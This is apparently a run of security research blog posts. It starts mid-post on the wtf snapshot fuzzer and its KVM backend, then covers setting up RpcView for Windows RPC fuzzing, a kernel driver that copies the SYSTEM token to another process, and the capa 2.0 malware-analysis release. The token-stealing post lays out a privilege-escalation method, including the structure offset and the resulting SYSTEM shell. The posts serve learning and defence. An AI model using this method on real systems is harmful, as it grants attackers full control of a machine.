#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure.

I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker that is a project creating micro vms to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project.

KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of the guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == nullptr) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}

On-demand paging

Implementing on demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and that services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When the hardware supports it, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit and I remember struggling to get the interruption fired. I am still not 100% sure that I got the details fully right but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support this VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be here and so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about 100$ / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case used generated executions of around 195 millions instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF possible. I built this corpus made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generate execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients are runners that send back results to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

bounty.png

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

elf64.png

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in a an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE) and including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes it a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists in looking for interesting keywords in the documentation and then experimenting by modyfing the impacket library or by writing an RPC client in C. As explained by @topotam77 in the episode 0x09 of the French Hack’n Speak podcast, this approach was particularly efficient in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists in enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time

RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.

After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic for a neophyte but there is nothing to worry about, that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.

Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:

  • Visual Studio 2019 (Community)
  • CMake >= 3.13.2
  • Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")
$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once, Visual Studio is installed. You have to open the “Visual Studio Installer”.

And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.

The question is how do you find and download Qt5 5.15.2? That’s were things get a bit tricky because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.

Once you have started the installer, it will prompt you to log in with your Qt account.

After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you let all the values as default, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to dowload all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).

You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of this file, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
}

We can see that each version number is represented as a longlong value. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041 = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
    0xA00004A610439LL,  //10.0.19041.1081
}

Finally, we can generate the Visual Studio solution and build it. I will show only the 64-bits compilation process, but if you want to compile the 32-bits version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

  • Qt is installed in C:\Qt\5.15.2\.
  • CMake is installed in C:\Program Files\CMake\.
  • The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).
mkdir Build\x64
cd Build\x64
set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\
"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64
"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Finally, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView

If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.

The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is section which is supposed to list all the procedures or functions that are exposed through an RPC server, but it actually only contains addresses.

This isn’t very convenient, but there is a cool thing about most Windows binaries. Microsoft publishes their associated PDB (Program DataBase) file.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that RpcView is not able, unlike other tools, to download the PDB files automatically. So, we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Links & Resources

Stealing Tokens In Kernel Mode With A Malicious Driver

Stealing Tokens In Kernel Mode With A Malicious Driver

Introduction

I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS and _TOKEN kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.

The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.

About Access Tokens

A common method of escalating privileges via buggy drivers or kernel mode exploits is to the steal the access token of a SYSTEM process and assign it to a process of your choosing. However this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.

Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However it is important to know how the access token structure is associated with each process.

Processes And The _EPROCESS Structure

Each process is represented in the kernel by a doubly linked list of _EPROCESS structures. This structure is not fully documented by Microsoft, but the ReactOS project as usual has a good definition of it. One of the members of this structure is called, unsurprisingly, Token. Technically this member is of type _EX_FAST_REF, but for our purposes, this is just an implementation detail. This Token member contains a pointer to the address of the token object belonging to that particular process. An image of this member within the _EPROCESS structure in WinDbg can be seen below:

Token in WinDbg

As you can see, the Token member is located at a fixed offset from the beginning of the _EPROCESS structure. This seems to change between versions of Windows, and on my test machine running Windows 10 20H2, the offset is 0x4b8.

The Method

Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS structure of the process we want to steal from, go to the Token member offset, save the address that it is pointing to, and copy it to the corresponding Token member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.

The Driver

In lieu of exploiting a kernel mode exploit, I write a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.

PID Struct

The driver will find the _EPROCESS structure for each PID, find the Token members, and copies the target process token to the destination process.

The User Mode Program

The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW and then calling DeviceIoControl with the correct IOCTL.

User Mode Code

The Driver Code

The code for the token copying is pretty straight forward. In the main function for handling IOCTLs, HandleDeviceIoControl, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS structure:

IOCTL Switch

Once we have the _EPROCESS address, we can use the offset of 0x4b8 to find the Token member address:

Token Offset

We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:

Copy Token

The Whole Process

Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:

Whoami

Next we use the user mode program to pass the two PIDs to the driver. The first PID, 4, is the PID of the System process, and is usually always 4. We see that the driver was accessed and the PIDs passed to it successfully:

User Mode Program

In the debug output view, we can see that HandleDeviceIoControl is called with the IOCTL_STEAL_TOKEN IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:

Copy Token Debug View

Finally we run whoami again, and see that we are now SYSTEM!

Whoami System

We can even do the same thing with another user’s token:

Whoami 2

Conclusion

Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level will make you able to defend it more effectively. To dig deeper I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.

capa 2.0: Better, Faster, Stronger

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and checkout the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.


Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.


Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.


Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.


Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.


Figure 5: capa v1.6 results without library code recognition


Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

